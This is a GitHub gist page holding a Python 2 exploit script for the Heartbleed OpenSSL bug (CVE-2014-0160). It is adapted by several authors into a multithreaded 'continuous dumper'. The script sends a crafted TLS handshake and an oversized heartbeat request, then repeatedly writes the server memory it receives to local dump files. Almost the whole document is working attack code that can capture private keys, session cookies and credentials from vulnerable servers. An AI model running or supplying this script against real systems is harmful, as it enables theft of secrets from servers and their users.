-
-
Save cinu/10249430 to your computer and use it in GitHub Desktop.
SSL heartbleed dirty dumper
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
# | |
# Modified slightly by Andreas Thienemann <athienemann@schubergphilis.com> for clearer exploit code | |
# and 64k reads | |
# | |
# This version of the exploit does write received data to a file called "dump" in the local directory | |
# for analysis. | |
# File is zeroed at the beginning of each dump run. | |
# | |
# Modified by Marcin 'redeemer' Probola: | |
# Quick and dirty continuous dumping modification | |
import sys | |
import struct | |
import socket | |
import time | |
import select | |
import re | |
import pprint | |
import os | |
import threading | |
from optparse import OptionParser | |
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') | |
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') | |
options.add_option('-t', '--threads', type='int', default=1, help='Number of threads (default: 1)') | |
def h2bin(x): | |
return x.replace(' ', '').replace('\n', '').decode('hex') | |
hello = h2bin(''' | |
16 03 02 00 dc 01 00 00 d8 03 02 53 | |
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
00 0f 00 01 01 | |
''') | |
# Build the exploit data. | |
# Needs to be a Heartbeat Request with a defined Payload length but no actual payload. | |
# This will result in openssl calling malloc() on the payload length but no actual payload to copy into this memory segment. | |
# As Heartbeat is an echo-type of packet we're going to be sent back the memory content of the malloc()'d segment on the server. | |
# Classic bounadry check violation. | |
hb = struct.pack(">BHHBH", | |
24, # TLS package kind - 24 == Heartbeat | |
770, # TLS Version (1.1) | |
3, # Length | |
1, # Heartbeat type (0x01 == Request, 0x02 == Response) | |
65535 # Payload length, control how much memory we can snarf on the server side. (exploit here) | |
) | |
def recvall(s, length, timeout=5): | |
endtime = time.time() + timeout | |
rdata = '' | |
remain = length | |
while remain > 0: | |
rtime = endtime - time.time() | |
if rtime < 0: | |
#sys.exit() | |
return None | |
r, w, e = select.select([s], [], [], 5) | |
if s in r: | |
data = s.recv(remain) | |
# EOF? | |
if not data: | |
return None | |
rdata += data | |
remain -= len(data) | |
return rdata | |
def recvmsg(s): | |
hdr = recvall(s, 5) | |
if hdr is None: | |
#print 'Unexpected EOF receiving record header - server closed connection' | |
return None, None, None | |
typ, ver, ln = struct.unpack('>BHH', hdr) | |
#print "Server length: %s" % (ln) | |
pay = recvall(s, ln, 10) | |
if pay is None: | |
#print 'Unexpected EOF receiving record payload - server closed connection' | |
return None, None, None | |
#print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) | |
return typ, ver, pay | |
def hit_hb(s, filenum): | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ is None: | |
#print 'No heartbeat response received, server likely not vulnerable' | |
return False | |
if typ == 24: | |
#print 'Received heartbeat response' | |
if len(pay) > 3: | |
with open("dump_%s.bin" % filenum, "a") as f: | |
f.write(pay) | |
f.close() | |
print "%s bytes written to./dump_%s.bin" % (len(pay),filenum) | |
#print 'WARNING: server returned more data than it should - server is vulnerable!' | |
else: | |
print 'Server processed malformed heartbeat, but did not return any extra data.' | |
return True | |
if typ == 21: | |
#print 'Received alert:' | |
hexdump(pay) | |
print 'Server returned error, likely not vulnerable' | |
return False | |
class ThreadClass(threading.Thread): | |
def run(self): | |
opts, args = options.parse_args() | |
while True: | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
#print 'Connecting...' | |
#sys.stdout.flush() | |
s.connect((args[0], opts.port)) | |
#print 'Sending Client Hello...' | |
#sys.stdout.flush() | |
s.send(hello) | |
#print 'Waiting for Server Hello...' | |
#sys.stdout.flush() | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ == None: | |
print 'Server closed connection without sending Server Hello.' | |
return | |
# Look for server hello done message. | |
if typ == 22 and ord(pay[0]) == 0x0E: | |
break | |
#print 'Sending heartbeat request...' | |
#sys.stdout.flush() | |
i = 0 | |
while os.path.exists("dump_%s.bin" % i): | |
i += 1; | |
open("dump_%s.bin" % i, 'w').close() | |
s.send(hb) | |
while hit_hb(s, i): | |
continue; | |
def main(): | |
try: | |
opts, args = options.parse_args() | |
if len(args) < 1: | |
options.print_help() | |
return | |
threads = int(opts.threads) | |
print "Continuous dumping (%s threads)" % threads; | |
for i in range(threads): | |
t = ThreadClass() | |
t.start() | |
time.sleep(1) | |
except KeyboardInterrupt: | |
sys.exit() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment